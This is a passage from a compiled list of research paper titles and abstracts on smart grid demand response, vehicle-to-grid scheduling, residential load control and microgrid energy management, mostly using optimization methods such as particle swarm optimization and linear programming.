the potential to be responsible for fewer tank to wheel CO2 emissions over their entire range than both a similar electric and conventional vehicle. The results also showed that unless highly CO2 intensive countries pursue a major decarbonization of their power generation, they will not be able to fully take advantage of the ability of EVs and PHEVs to reduce the CO2 emissions from automotive transport. --- paper_title: Optimal Power Management of Residential Customers in the Smart Grid paper_content: Recently intensive efforts have been made on the transformation of the world's largest physical system, the power grid, into a “smart grid” by incorporating extensive information and communication infrastructures. Key features in such a “smart grid” include high penetration of renewable and distributed energy sources, large-scale energy storage, market-based online electricity pricing, and widespread demand response programs. From the perspective of residential customers, we can investigate how to minimize the expected electricity cost with real-time electricity pricing, which is the focus of this paper. By jointly considering energy storage, local distributed generation such as photovoltaic (PV) modules or small wind turbines, and inelastic or elastic energy demands, we mathematically formulate this problem as a stochastic optimization problem and approximately solve it by using the Lyapunov optimization approach. From the theoretical analysis, we have also found a good tradeoff between cost saving and storage capacity. A salient feature of our proposed approach is that it can operate without any future knowledge on the related stochastic models (e.g., the distribution) and is easy to implement in real time. We have also evaluated our proposed solution with practical data sets and validated its effectiveness. --- paper_title: Analyzing the system effects of optimal demand response utilization for reserve procurement and peak clipping paper_content: In this paper the effect of demand response (DR) resource utilization in the system operation is analyzed by using an optimization based simultaneous market clearing framework. Two distinct utilization patterns that DR can be involved are reserve supplying by Reserve Supplying Demand Response (RSDR) and providing actual curtailment for demand reduction or peak clipping by Peak Clipping Demand Response (PCDR). The provider of RSDR will sell its ability to tolerate probable curtailment and the PCDR will sell its real curtailment ability. These utilizations have different effects on system indices. Therefore the effect of different DR utilization patterns are analyzed and compared in this paper. IEEE RTS is selected as the test case for studying the effect of DR utilization patterns. --- paper_title: An optimal scheduling problem in distribution networks considering V2G paper_content: This paper addresses the problem of energy resource scheduling. An aggregator will manage all distributed resources connected to its distribution network, including distributed generation based on renewable energy resources, demand response, storage systems, and electrical gridable vehicles. The use of gridable vehicles will have a significant impact on power systems management, especially in distribution networks. Therefore, the inclusion of vehicles in the optimal scheduling problem will be very important in future network management. The proposed particle swarm optimization approach is compared with a reference methodology based on mixed integer non-linear programming, implemented in GAMS, to evaluate the effectiveness of the proposed methodology. The paper includes a case study that consider a 32 bus distribution network with 66 distributed generators, 32 loads and 50 electric vehicles. --- paper_title: Optimal Residential Load Control With Price Prediction in Real-Time Electricity Pricing Environments paper_content: Real-time electricity pricing models can potentially lead to economic and environmental advantages compared to the current common flat rates. In particular, they can provide end users with the opportunity to reduce their electricity expenditures by responding to pricing that varies with different times of the day. However, recent studies have revealed that the lack of knowledge among users about how to respond to time-varying prices as well as the lack of effective building automation systems are two major barriers for fully utilizing the potential benefits of real-time pricing tariffs. We tackle these problems by proposing an optimal and automatic residential energy consumption scheduling framework which attempts to achieve a desired trade-off between minimizing the electricity payment and minimizing the waiting time for the operation of each appliance in household in presence of a real-time pricing tariff combined with inclining block rates. Our design requires minimum effort from the users and is based on simple linear programming computations. Moreover, we argue that any residential load control strategy in real-time electricity pricing environments requires price prediction capabilities. This is particularly true if the utility companies provide price information only one or two hours ahead of time. By applying a simple and efficient weighted average price prediction filter to the actual hourly-based price values used by the Illinois Power Company from January 2007 to December 2009, we obtain the optimal choices of the coefficients for each day of the week to be used by the price predictor filter. Simulation results show that the combination of the proposed energy consumption scheduling design and the price predictor filter leads to significant reduction not only in users' payments but also in the resulting peak-to-average ratio in load demand for various load scenarios. Therefore, the deployment of the proposed optimal energy consumption scheduling schemes is beneficial for both end users and utility companies. --- paper_title: Particle swarm optimization paper_content: Particle swarm optimization (PSO) has undergone many changes since its intro- duction in 1995. As researchers have learned about the technique, they have derived new versions, developed new applications, and published theoretical studies of the effects of the various parameters and aspects of the algorithm. This paper comprises a snapshot of particle swarming from the authors' perspective, including variations in the algorithm, current and ongoing research, applications and open problems. --- paper_title: Near optimal demand-side energy management under real-time demand-response pricing paper_content: In this paper, we present demand-side energy management under real-time demand-response pricing as a task scheduling problem which is NP-hard. Using minmax as the objective, we show that the schedule produced by our minMax scheduling algorithm has a number of salient advantages: significant peak-shaving, cost reduction, and risk-aversion for the consumers. We prove that our algorithm finds near-optimal solutions and our simulation study show that the actual performance is better than the worst-case bound. The algorithm is simple to implement and efficient at the scale of large enterprises. --- paper_title: Appliance commitment for household load scheduling paper_content: This paper presents a novel appliance commitment algorithm that schedules thermostatically controlled household loads based on price and consumption forecasts considering users' comfort settings to meet an optimization objective such as minimum payment or maximum comfort. The formulation of an appliance commitment problem is described using an electrical water heater load as an example. The thermal dynamics of heating and coasting of the water heater load is modeled by physical models; random hot water consumption is modeled with statistical methods. The models are used to predict the appliance operation over the scheduling time horizon. User comfort is transformed to a set of linear constraints. Then, a novel linear-sequential-optimization-enhanced, multiloop algorithm is used to solve the appliance commitment problem. The simulation results demonstrate that the algorithm is fast, robust, and flexible. The algorithm can be used in home/building energy-management systems to help household owners or building managers to automatically create optimal load operation schedules based on different cost and comfort settings and compare cost/benefits among schedules. --- paper_title: Residential demand response with interruptible tasks: Duality and algorithms paper_content: This paper deals with optimal scheduling of demand response in a residential setup when the electricity prices are known ahead of time. Each end-user has a “must-run” load, and two types of adjustable loads. The first type must consume a specified total amount of energy over the scheduling horizon, but its consumption can be adjusted across the horizon. The second type of load has adjustable power consumption without a total energy requirement, but operation of the load at reduced power results in dissatisfaction of the end-user. Each adjustable load is interruptible in the sense that the load can be either operated (resulting in nonzero power consumption), or not operated (resulting in zero power consumption). Examples of such adjustable interruptible loads are charging a plugin hybrid electric vehicle or operating a pool pump. The problem amounts to minimizing the cost of electricity plus user dissatisfaction, subject to individual load consumption constraints. The problem is nonconvex, but surprisingly it is shown to have zero duality gap if a continuous-time horizon is considered. This opens up the possibility of using Lagrangian dual algorithms without loss of optimality in order to come up with efficient demand response scheduling schemes. --- paper_title: Demand Side Management in Smart Grid Using Heuristic Optimization paper_content: Demand side management (DSM) is one of the important functions in a smart grid that allows customers to make informed decisions regarding their energy consumption, and helps the energy providers reduce the peak load demand and reshape the load profile. This results in increased sustainability of the smart grid, as well as reduced overall operational cost and carbon emission levels. Most of the existing demand side management strategies used in traditional energy management systems employ system specific techniques and algorithms. In addition, the existing strategies handle only a limited number of controllable loads of limited types. This paper presents a demand side management strategy based on load shifting technique for demand side management of future smart grids with a large number of devices of several types. The day-ahead load shifting technique proposed in this paper is mathematically formulated as a minimization problem. A heuristic-based Evolutionary Algorithm (EA) that easily adapts heuristics in the problem was developed for solving this minimization problem. Simulations were carried out on a smart grid which contains a variety of loads in three service areas, one with residential customers, another with commercial customers, and the third one with industrial customers. The simulation results show that the proposed demand side management strategy achieves substantial savings, while reducing the peak load demand of the smart grid. --- paper_title: Intelligent energy resource management considering vehicle-to-grid: A Simulated Annealing approach paper_content: This paper proposes a simulated annealing (SA) approach to address energy resources management from the point of view of a virtual power player (VPP) operating in a smart grid. Distributed generation, demand response, and gridable vehicles are intelligently managed on a multiperiod basis according to V2G users' profiles and requirements. Apart from using the aggregated resources, the VPP can also purchase additional energy from a set of external suppliers. The paper includes a case study for a 33 bus distribution network with 66 generators, 32 loads, and 1000 gridable vehicles. The results of the SA approach are compared with a methodology based on mixed-integer nonlinear programming. A variation of this method, using ac load flow, is also used and the results are compared with the SA solution using network simulation. The proposed SA approach proved to be able to obtain good solutions in low execution times, providing VPPs with suitable decision support for the management of a large number of distributed resources. --- paper_title: A demand side management based simulation platform incorporating heuristic optimization for management of household appliances paper_content: Abstract Demand-Side Management (DSM) can be defined as the implementation of policies and measures to control, regulate, and reduce energy consumption. This paper introduces dynamic distributed resource management and optimized operation of household appliances in a DSM based simulation tool. The principal purpose of the simulation tool is to illustrate customer-driven DSM operation, and evaluate an estimate for home electricity consumption while minimizing the customer’s cost. A heuristic optimization algorithm i.e. Binary Particle Swarm Optimization (BPSO) is used for the optimization of DSM operation in the tool. The tool also simulates the operation of household appliances as a Hybrid Renewable Energy System (HRES). The resource management technique is implemented using an optimization algorithm, i.e. Particle Swarm Optimization (PSO), which determines the distribution of energy obtained from various sources depending on the load. The validity of the tool is illustrated through an example case study for various household situations. --- paper_title: Demand Response Optimization for Smart Home Scheduling Under Real-Time Pricing paper_content: Demand response (DR) is very important in the future smart grid, aiming to encourage consumers to reduce their demand during peak load hours. However, if binary decision variables are needed to specify start-up time of a particular appliance, the resulting mixed integer combinatorial problem is in general difficult to solve. In this paper, we study a versatile convex programming (CP) DR optimization framework for the automatic load management of various household appliances in a smart home. In particular, an L1 regularization technique is proposed to deal with schedule-based appliances (SAs), for which their on/off statuses are governed by binary decision variables. By relaxing these variables from integer to continuous values, the problem is reformulated as a new CP problem with an additional L1 regularization term in the objective. This allows us to transform the original mixed integer problem into a standard CP problem. Its major advantage is that the overall DR optimization problem remains to be convex and therefore the solution can be found efficiently. Moreover, a wide variety of appliances with different characteristics can be flexibly incorporated. Simulation result shows that the energy scheduling of SAs and other appliances can be determined simultaneously using the proposed CP formulation. --- paper_title: The technical, economic and commercial viability of the vehicle-to-grid concept paper_content: The idea that electric vehicles can be used to supply power to the grid for stabilisation and peak time supply is compelling, especially in regions where traditional forms of storage, back up or peaking supply are unavailable or expensive. A number of variants of the vehicle-to-grid theme have been proposed and prototypes have proven that the technological means to deliver many of these are available. This study reviews the most popular variants and investigates their viability using Western Australia, the smallest wholesale electricity market in the world, as an extreme test case. Geographical and electrical isolation prevents the trade of energy and ancillary services with neighbouring regions and the flat landscape prohibits hydroelectric storage. Hot summers and the widespread use of air-conditioning means that peak energy demand is a growing issue, and the ongoing addition to already underutilised generation and transmission capacity is unsustainable. The report concludes that most variants of vehicle-to-grid currently require too much additional infrastructure investment, carry significant risk and are currently too costly to implement in the light of alternative options. Charging electric vehicles can, however, be added to planned demand side management schemes without the need for additional capital investment. --- paper_title: Efficient Utilization of Renewable Energy Sources by Gridable Vehicles in Cyber-Physical Energy Systems paper_content: The main sources of emission today are from the electric power and transportation sectors. One of the main goals of a cyber-physical energy system (CPES) is the integration of renewable energy sources and gridable vehicles (GVs) to maximize emission reduction. GVs can be used as loads, sources and energy storages in CPES. A large CPES is very complex considering all conventional and green distributed energy resources, dynamic data from sensors, and smart operations (e.g., charging/discharging, control, etc.) from/to the grid to reduce both cost and emission. If large number of GVs are connected to the electric grid randomly, peak load will be very high. The use of conventional thermal power plants will be economically expensive and environmentally unfriendly to sustain the electrified transportation. Intelligent scheduling and control of elements of energy systems have great potential for evolving a sustainable integrated electricity and transportation infrastructure. The maximum utilization of renewable energy sources using GVs for sustainable CPES (minimum cost and emission) is presented in this paper. Three models are described and results of the smart grid model show the highest potential for sustainability. --- paper_title: Intelligent unit commitment with vehicle-to-grid —A cost-emission optimization paper_content: A gridable vehicle (GV) can be used as a small portable power plant (S3P) to enhance the security and reliability of utility grids. Vehicle-to-grid (V2G) technology has drawn great interest in the recent years and its success depends on intelligent scheduling of GVs or S3Ps in constrained parking lots. V2G can reduce dependencies on small expensive units in existing power systems, resulting in reduced operation cost and emissions. It can also increase reserve and reliability of existing power systems. Intelligent unit commitment (UC) with V2G for cost and emission optimization in power system is presented in this paper. As number of gridable vehicles in V2G is much higher than small units of existing systems, UC with V2G is more complex than basic UC for only thermal units. Particle swarm optimization (PSO) is proposed to balance between cost and emission reductions for UC with V2G. PSO can reliably and accurately solve this complex constrained optimization problem easily and quickly. In the proposed solution model, binary PSO optimizes on/off states of power generating units easily. Vehicles are presented by integer numbers instead of zeros and ones to reduce the dimension of the problem. Balanced hybrid PSO optimizes the number of gridable vehicles of V2G in the constrained parking lots. Balanced PSO provides a balance between local and global searching abilities, and finds a balance in reducing both operation cost and emission. Results show a considerable amount of cost and emission reduction with intelligent UC with V2G. Finally, the practicality of UC with V2G is discussed for real-world applications. --- paper_title: Using fleets of electric-drive vehicles for grid support paper_content: Electric-drive vehicles can provide power to the electric grid when they are parked (vehicle-to-grid power). We evaluated the economic potential of two utility-owned fleets of battery-electric vehicles to provide power for a specific electricity market, regulation, in four US regional regulation services markets. The two battery-electric fleet cases are: (a) 100 Th!nk City vehicle and (b) 252 Toyota RAV4. Important variables are: (a) the market value of regulation services, (b) the power capacity (kW) of the electrical connections and wiring, and (c) the energy capacity (kWh) of the vehicle's battery. With a few exceptions when the annual market value of regulation was low, we find that vehicle-to-grid power for regulation services is profitable across all four markets analyzed. Assuming now more than current Level 2 charging infrastructure (6.6 kW) the annual net profit for the Th!nk City fleet is from US$ 7000 to 70,000 providing regulation down only. For the RAV4 fleet the annual net profit ranges from US$ 24,000 to 260,000 providing regulation down and up. Vehicle-to-grid power could provide a significant revenue stream that would improve the economics of grid-connected electric-drive vehicles and further encourage their adoption. It would also improve the stability of the electrical grid. --- paper_title: Combined Operations of Renewable Energy Systems and Responsive Demand in a Smart Grid paper_content: The integration of renewable energy systems (RESs) in smart grids (SGs) is a challenging task, mainly due to the intermittent and unpredictable nature of the sources, typically wind or sun. Another issue concerns the way to support the consumers' participation in the electricity market aiming at minimizing the costs of the global energy consumption. This paper proposes an energy management system (EMS) aiming at optimizing the SG's operation. The EMS behaves as a sort of aggregator of distributed energy resources allowing the SG to participate in the open market. By integrating demand side management (DSM) and active management schemes (AMS), it allows a better exploitation of renewable energy sources and a reduction of the customers' energy consumption costs with both economic and environmental benefits. It can also improve the grid resilience and flexibility through the active participation of distribution system operators (DSOs) and electricity supply/demand that, according to their preferences and costs, respond to real-time price signals using market processes. The efficiency of the proposed EMS is verified on a 23-bus 11-kV distribution network. --- paper_title: Review of the Impact of Vehicle-to-Grid Technologies on Distribution Systems and Utility Interfaces paper_content: Plug-in vehicles can behave either as loads or as a distributed energy and power resource in a concept known as vehicle-to-grid (V2G) connection. This paper reviews the current status and implementation impact of V2G/grid-to-vehicle (G2V) technologies on distributed systems, requirements, benefits, challenges, and strategies for V2G interfaces of both individual vehicles and fleets. The V2G concept can improve the performance of the electricity grid in areas such as efficiency, stability, and reliability. A V2G-capable vehicle offers reactive power support, active power regulation, tracking of variable renewable energy sources, load balancing, and current harmonic filtering. These technologies can enable ancillary services, such as voltage and frequency control and spinning reserve. Costs of V2G include battery degradation, the need for intensive communication between the vehicles and the grid, effects on grid distribution equipment, infrastructure changes, and social, political, cultural, and technical obstacles. Although V2G operation can reduce the lifetime of vehicle batteries, it is projected to become economical for vehicle owners and grid operators. Components and unidirectional/bidirectional power flow technologies of V2G systems, individual and aggregated structures, and charging/recharging frequency and strategies (uncoordinated/coordinated smart) are addressed. Three elements are required for successful V2G operation: power connection to the grid, control and communication between vehicles and the grid operator, and on-board/off-board intelligent metering. Success of the V2G concept depends on standardization of requirements and infrastructure decisions, battery technology, and efficient and smart scheduling of limited fast-charge infrastructure. A charging/discharging infrastructure must be deployed. Economic benefits of V2G technologies depend on vehicle aggregation and charging/recharging frequency and strategies. The benefits will receive increased attention from grid operators and vehicle owners in the future. --- paper_title: Real-time vehicle-to-grid control algorithm under price uncertainty paper_content: The vehicle-to-grid (V2G) system enables energy flow from the electric vehicles (EVs) to the grid. The distributed power of the EVs can either be sold to the grid or be used to provide frequency regulation service when V2G is implemented. A V2G control algorithm is necessary to decide whether the EV should be charged, discharged, or provide frequency regulation service in each hour. The V2G control problem is further complicated by the price uncertainty, where the electricity price is determined dynamically every hour. In this paper, we study the real-time V2G control problem under price uncertainty. We model the electricity price as a Markov chain with unknown transition probabilities and formulate the problem as a Markov decision process (MDP). This model features implicit estimation of the impact of future electricity prices and current control operation on long-term profits. The Q-learning algorithm is then used to adapt the control operation to the hourly available price in order to maximize the profit for the EV owner during the whole parking time. We evaluate our proposed V2G control algorithm using both the simulated price and the actual price from PJM in 2010. Simulation results show that our proposed algorithm can work effectively in the real electricity market and it is able to increase the profit significantly compared with the conventional EV charging scheme. --- paper_title: A day-ahead electricity pricing model based on smart metering and demand-side management paper_content: Several factors support more deployment of real-time pricing (RTP); including recent developments in the area of smart metering, regulators interest in promoting demand response programs and well-organized electricity markets. This paper first reviews time-based electricity pricing and the main barriers and issues to fully unleash benefits of RTP programs. Then, a day-ahead real-time pricing (DA-RTP) model is proposed, which addresses some of these issues. The proposed model can assist a retail energy provider and/or a distribution company (DISCO) to offer optimal DA hourly prices using smart metering. The real-time prices are determined through an optimization problem which seeks to maximize the electricity provider's profit, while considering consumers' benefit, minimum daily energy consumption, consumer response to posted electricity prices, and distribution network constraints. The numerical results associated with Ontario electricity tariffs indicate that instead of directly posting DA market prices to consumers, it would be better to calculate optimal prices which would yield higher benefit both for the energy provider and consumers. --- paper_title: Optimal Charging Strategies for Unidirectional Vehicle-to-Grid paper_content: Vehicle-to-grid (V2G) has been proposed as a way to increase the adoption rate of electric vehicles (EVs). Unidirectional V2G is especially attractive because it requires little if any additional infrastructure other than communication between the EV and an aggregator. The aggregator in turn combines the capacity of many EVs to bid into energy markets. In this work an algorithm for unidirectional regulation is developed for use by an aggregator. Several smart charging algorithms are used to set the point about which the rate of charge varies while performing regulation. An aggregator profit maximization algorithm is formulated with optional system load and price constraints analogous to the smart charging algorithms. Simulations on a hypothetical group of 10 000 commuter EVs in the Pacific Northwest verify that the optimal algorithms increase aggregator profits while reducing system load impacts and customer costs. --- paper_title: Coordinated Scheduling of Residential Distributed Energy Resources to Optimize Smart Home Energy Services paper_content: We describe algorithmic enhancements to a decision-support tool that residential consumers can utilize to optimize their acquisition of electrical energy services. The decision-support tool optimizes energy services provision by enabling end users to first assign values to desired energy services, and then scheduling their available distributed energy resources (DER) to maximize net benefits. We chose particle swarm optimization (PSO) to solve the corresponding optimization problem because of its straightforward implementation and demonstrated ability to generate near-optimal schedules within manageable computation times. We improve the basic formulation of cooperative PSO by introducing stochastic repulsion among the particles. The improved DER schedules are then used to investigate the potential consumer value added by coordinated DER scheduling. This is computed by comparing the end-user costs obtained with the enhanced algorithm simultaneously scheduling all DER, against the costs when each DER schedule is solved separately. This comparison enables the end users to determine whether their mix of energy service needs, available DER and electricity tariff arrangements might warrant solving the more complex coordinated scheduling problem, or instead, decomposing the problem into multiple simpler optimizations. --- paper_title: Concurrent optimization of consumer's electrical energy bill and producer's power generation cost under a dynamic pricing model paper_content: Demand response is a key element of the smart grid technologies. This is a particularly interesting problem with the use of dynamic energy pricing schemes which incentivize electricity consumers to consume electricity more prudently in order to minimize their electric bill. On the other hand optimizing the number and production time of power generation facilities is a key challenge. In this paper, three models are presented for consumers, utility companies, and a third-part arbiter to optimize the cost to the parties individually and in combination. Our models have high quality and exhibit superior performance, by realistic consideration of non-cooperative energy buyers and sellers and getting real-time feedback from their interactions. Simulation results show that the energy consumption distribution becomes very stable during the day utilizing our models, while consumers and utility companies pay lower cost. --- paper_title: Distributed Demand and Response Algorithm for Optimizing Social-Welfare in Smart Grid paper_content: This paper presents a distributed Demand and Response algorithm for smart grid with the objective of optimizing social-welfare. Assuming the power demand range is known or predictable ahead of time, our proposed distributed algorithm will calculate demand and response of all participating energy demanders and suppliers, as well as energy flow routes, in a fully distributed fashion, such that the social-welfare is optimized. During the computation, each node (e.g., demander or supplier) only needs to exchange limited rounds of messages with its neighboring nodes. It provides a potential scheme for energy trade among participants in the smart girds. Our theoretical analysis proves that the algorithm converges even if there is some random noise induced in the process of our distributed Lagrange-Newton based solution. The simulation also shows that the result is close to that of centralized solution. --- paper_title: Optimal demand response using mechanism design in the smart grid paper_content: Demand side management is considered to be a key component in the future smart grid that can help to achieve an efficient utilization of energy. In this paper we consider a residential power network, where consumers are asked to report their information about power usage to service provider, then the provider determines the optimal power allocations and charges for each user based on social welfare maximization. The benefit of each user is related to demand for electricity and the quantity of power allocated. Assuming consumers are strategic and selfish, we proposed an efficient pricing algorithm with which consumers cannot achieve greater benefit by mis-reporting and social welfare maximization can be achieved. Finally we present simulation results to show that our proposed method can benefit both of the service provider and consumers. --- paper_title: Optimal Scheduling of Vehicle-to-Grid Energy and Ancillary Services paper_content: Vehicle-to-grid (V2G), the provision of energy and ancillary services from an electric vehicle (EV) to the grid, has the potential to offer financial benefits to EV owners and system benefits to utilities. In this work a V2G algorithm is developed to optimize energy and ancillary services scheduling. The ancillary services considered are load regulation and spinning reserves. The algorithm is developed to be used by an aggregator, which may be a utility or a third party. This algorithm maximizes profits to the aggregator while providing additional system flexibility and peak load shaving to the utility and low costs of EV charging to the customer. The formulation also takes into account unplanned EV departures during the contract periods and compensates accordingly. Simulations using a hypothetical group of 10 000 commuter EVs in the ERCOT system using different battery replacement costs demonstrate these significant benefits. --- paper_title: Advanced Demand Side Management for the Future Smart Grid Using Mechanism Design paper_content: In the future smart grid, both users and power companies can potentially benefit from the economical and environmental advantages of smart pricing methods to more effectively reflect the fluctuations of the wholesale price into the customer side. In addition, smart pricing can be used to seek social benefits and to implement social objectives. To achieve social objectives, the utility company may need to collect various information about users and their energy consumption behavior, which can be challenging. In this paper, we propose an efficient pricing method to tackle this problem. We assume that each user is equipped with an energy consumption controller (ECC) as part of its smart meter. All smart meters are connected to not only the power grid but also a communication infrastructure. This allows two-way communication among smart meters and the utility company. We analytically model each user's preferences and energy consumption patterns in form of a utility function. Based on this model, we propose a Vickrey-Clarke-Groves (VCG) mechanism which aims to maximize the social welfare, i.e., the aggregate utility functions of all users minus the total energy cost. Our design requires that each user provides some information about its energy demand. In return, the energy provider will determine each user's electricity bill payment. Finally, we verify some important properties of our proposed VCG mechanism for demand side management such as efficiency, user truthfulness, and nonnegative transfer. Simulation results confirm that the proposed pricing method can benefit both users and utility companies. --- paper_title: Multi-period optimal energy procurement and demand response in smart grid with uncertain supply paper_content: We propose a simple model that integrates two-period electricity markets, uncertainty in renewable generation, and real-time dynamic demand response. A load-serving entity decides its day-ahead procurement to optimize expected social welfare a day before energy delivery. At delivery time when renewable generation is realized, it sets prices to manage demand and purchase additional power on the real-time market, if necessary, to balance supply and demand. We derive the optimal day-ahead decision, propose real-time demand response algorithm, and study the effect of volume and variability of renewable generation on the social welfare. --- paper_title: Intelligent Scheduling of Hybrid and Electric Vehicle Storage Capacity in a Parking Lot for Profit Maximization in Grid Power Transactions paper_content: This paper proposes an intelligent method for scheduling usage of available energy storage capacity from plug-in hybrid electric vehicles (PHEV) and electric vehicles (EV). The batteries on these vehicles can either provide power to the grid when parked, known as vehicle-to-grid (V2G) concept or take power from the grid to charge the batteries on the vehicles. A scalable parking lot model is developed with different parameters assigned to fleets of vehicles. The size of the parking lot is assumed to be large enough to accommodate the number of vehicles performing grid transactions. In order to figure out the appropriate charge and discharge times throughout the day, binary particle swarm optimization is applied. Price curves from the California ISO database are used in this study to have realistic price fluctuations. Finding optimal solutions that maximize profits to vehicle owners while satisfying system and vehicle owners constraints is the objective of this study. Different fleets of vehicles are used to approximate varying customer base and demonstrate the scalability of parking lots for V2G. The results are compared for consistency and scalability. Discussions on how this technique can be applied to other grid issues such as peaking power are included at the end. --- paper_title: A microgrid energy management system for inducing optimal demand response paper_content: This paper focuses on optimal operation schedule of a Microgrid that is interconnected to the power grid. We develop a mathematical model to compute the optimal operation schedule that embodies demand response. Integer Programming optimization is used to this end. Our model incorporates the electricity load into three types: fixed, transferable, and user-action loads. The transferable load plays a key role in molding demand response. Experimental results show that the proposed model exploits the demand elasticity and significantly reduces the total operation cost. Also observed from the experiments are the impact of the uncertainty in renewable distributed generators on operation schedule and total cost and the role of power storages for enhancing the demand elasticity with respect to user-action loads and for reserving power against high price. --- paper_title: An integrated approach for distributed energy resource short term scheduling in smart grids considering realistic power system simulation paper_content: Abstract The large increase of distributed energy resources, including distributed generation, storage systems and demand response, especially in distribution networks, makes the management of the available resources a more complex and crucial process. With wind based generation gaining relevance, in terms of the generation mix, the fact that wind forecasting accuracy rapidly drops with the increase of the forecast anticipation time requires to undertake short-term and very short-term re-scheduling so the final implemented solution enables the lowest possible operation costs. This paper proposes a methodology for energy resource scheduling in smart grids, considering day ahead, hour ahead and five minutes ahead scheduling. The short-term scheduling, undertaken five minutes ahead, takes advantage of the high accuracy of the very-short term wind forecasting providing the user with more efficient scheduling solutions. The proposed method uses a Genetic Algorithm based approach for optimization that is able to cope with the hard execution time constraint of short-term scheduling. Realistic power system simulation, based on PSCAD®, is used to validate the obtained solutions. The paper includes a case study with a 33 bus distribution network with high penetration of distributed energy resources implemented in PSCAD®. --- paper_title: Distributed energy resource short-term scheduling using Signaled Particle Swarm Optimization paper_content: Distributed Energy Resources (DER) scheduling in smart grids presents a new challenge to system operators. The increase of new resources, such as storage systems and demand response programs, results in additional computational efforts for optimization problems. On the other hand, since natural resources, such as wind and sun, can only be precisely forecasted with small anticipation, short-term scheduling is especially relevant requiring a very good performance on large dimension problems. Traditional techniques such as Mixed-Integer Non-Linear Programming (MINLP) do not cope well with large scale problems. This type of problems can be appropriately addressed by metaheuristics approaches. This paper proposes a new methodology called Signaled Particle Swarm Optimization (SiPSO) to address the energy resources management problem in the scope of smart grids, with intensive use of DER. The proposed methodology's performance is illustrated by a case study with 99 distributed generators, 208 loads, and 27 storage units. The results are compared with those obtained in other methodologies, namely MINLP, Genetic Algorithm, original Particle Swarm Optimization (PSO), Evolutionary PSO, and New PSO. SiPSO performance is superior to the other tested PSO variants, demonstrating its adequacy to solve large dimension problems which require a decision in a short period of time. --- paper_title: Optimal control of a residential microgrid paper_content: We propose a generic mixed integer linear programming model to minimize the operating cost of a residential microgrid. We model supply and demand of both electrical and thermal energy as decision variables. The modeled microgrid is operated in grid-connected mode. It covers solar energy, distributed generators, energy storages, and loads, among them controllable load jobs released by home appliances and electric vehicles. We propose a model predictive control scheme to iteratively produce a control sequence for the studied microgrid. Our case study reveals the performance of minimum cost control by comparison with benchmark control policies. We consider three price scenarios in our analyses which include two market-based scenarios. Numerical results from our study indicate savings in annual operating cost between 3.1 and 7.6 percent. --- paper_title: Dynamic Residential Demand Response and Distributed Generation Management in Smart Microgrid with Hierarchical Agents paper_content: Abstract Smart grid has been a significant development trend of power system. Within smart grid, microgrids share the burden of traditional grids, reduce energy consumption cost and alleviate environment deterioration. This paper proposes a dynamic Demand Response (DR) and Distributed Generation (DG) management approach in the context of smart microgrid for a residential community. With a dynamic update mechanism, the DR operates automatically and allows manual interference. The DG management coordinates with DR and considers stochastic elements, such as stochastic load and wind power, to reduce the energy consumption cost of the community. Simulation and numerical results show the effectiveness of the system on reducing the energy consumption cost while keeping users’ satisfaction at a high level. --- paper_title: Control for large scale demand response of thermostatic loads* paper_content: Demand response is an important Smart Grid concept that aims at facilitating the integration of volatile energy resources into the electricity grid. This paper considers a residential demand response scenario and specifically looks into the problem of managing a large number thermostat-based appliances with on/off operation. The objective is to reduce the consumption peak of a group of loads composed of both flexible and inflexible units. The power flexible units are the thermostat-based appliances. We discuss a centralized, model predictive approach and a distributed structure with a randomized dispatch strategy. --- paper_title: Optimized Day-Ahead Pricing for Smart Grids with Device-Specific Scheduling Flexibility paper_content: Smart grids are capable of two-way communication between individual user devices and the electricity provider, enabling providers to create a control-feedback loop using time-dependent pricing. By charging users more in peak and less in off-peak hours, the provider can induce users to shift their consumption to off-peak periods, thus relieving stress on the power grid and the cost incurred from large peak loads. We formulate the electricity provider's cost minimization problem in setting these prices by considering consumers' device-specific scheduling flexibility and the provider's cost structure of purchasing electricity from an electricity generator. Consumers' willingness to shift their device usage is modeled probabilistically, with parameters that can be estimated from real data. We develop an algorithm for computing day-ahead prices, and another algorithm for estimating and refining user reaction to the prices. Together, these two algorithms allow the provider to dynamically adjust the offered prices based on user behavior. Numerical simulations with data from an Ontario electricity provider show that our pricing algorithm can significantly reduce the cost incurred by the provider. --- paper_title: An integer linear programming based optimization for home demand-side management in smart grid paper_content: We propose a consumption scheduling mechanism for home area load management in smart grid using integer linear programming (ILP) technique. The aim of the proposed scheduling is to minimise the peak hourly load in order to achieve an optimal (balanced) daily load schedule. The proposed mechanism is able to schedule both the optimal power and the optimal operation time for power-shiftable appliances and time-shiftable appliances respectively according to the power consumption patterns of all the individual appliances. Simulation results based on home and neighbourhood area scenarios have been presented to demonstrate the effectiveness of the proposed technique. --- paper_title: A linear programming model for reducing system peak through customer load control programs paper_content: A linear programming (LP) model has been developed to optimize the amount of power system peak load reduction through scheduling of control periods in commercial/industrial and residential load control programs at Florida Power and Light Company, USA. The LP model can be used to determine both long and short term control scheduling strategies and for planning the number of customers which should be enrolled in each program. Results of applying the model to a forecasted late 1990s summer peak day load shape are presented. It is concluded that LP solutions provide a relatively inexpensive and powerful approach to planning and scheduling load control. Also, it is not necessary to model completely general scheduling of control periods in order to obtain near best solutions to peak load reduction. --- paper_title: Control method for multi-microgrid systems in smart grid environment—Stability, optimization and smart demand participation paper_content: This paper presents a control strategy for microgrids in smart grid environment. A hierarchical control strategy is developed to ensure stability and to optimize operation of microgrid. Communication, control and advanced metering infrastructure of smart grids are used to facilitate this control strategy. The control strategy incorporates storage device, electric car, various distributed energy resources and loads. Proposed control strategy considers microgrid operation in island and grid-connected mode. Island microgrid is stabilized by managing storage devices, dispatchable energy units and controllable loads. The control strategy is based on demand participation while stability of system has the highest priority. Theoretical discussion beyond presented algorithms reveal evidently the effectiveness of the proposed control method. --- paper_title: Parallel autonomous optimization of demand response with renewable distributed generators paper_content: We propose a framework for demand response in smart grids that integrate renewable distributed generators (DGs). In this framework, some users have DGs and can generate part of their electricity. They can also sell extra generation to the utility company. The goal is to optimize the load schedule of users to minimize the utility company's cost and user payments. We employ parallel autonomous optimization, where each user requires only knowledge of the aggregated load of other users instead of the load profiles of individual users, and can execute distributed optimization simultaneously. We performed numerical examples to validate our algorithm. The results show that our method can significantly lower peak hour load and reduce the costs to users and the utility. Since the autonomous user optimizations are executed in parallel, our method also dramatically decreases the computation time, management complexity, and communication costs. --- paper_title: Optimal Scheduling of Smart Homes Energy Consumption with Microgrid paper_content: Microgrid is taken as the future Smart Grid, and can work as a local energy provider to domestic buildings and reduce energy expenses. To further lower the cost, a Smart Homes idea is suggested. Smart Homes of the future will include automation systems and could provide lower energy consumption costs and comfortable and secure living environment to end users. If the energy consumption 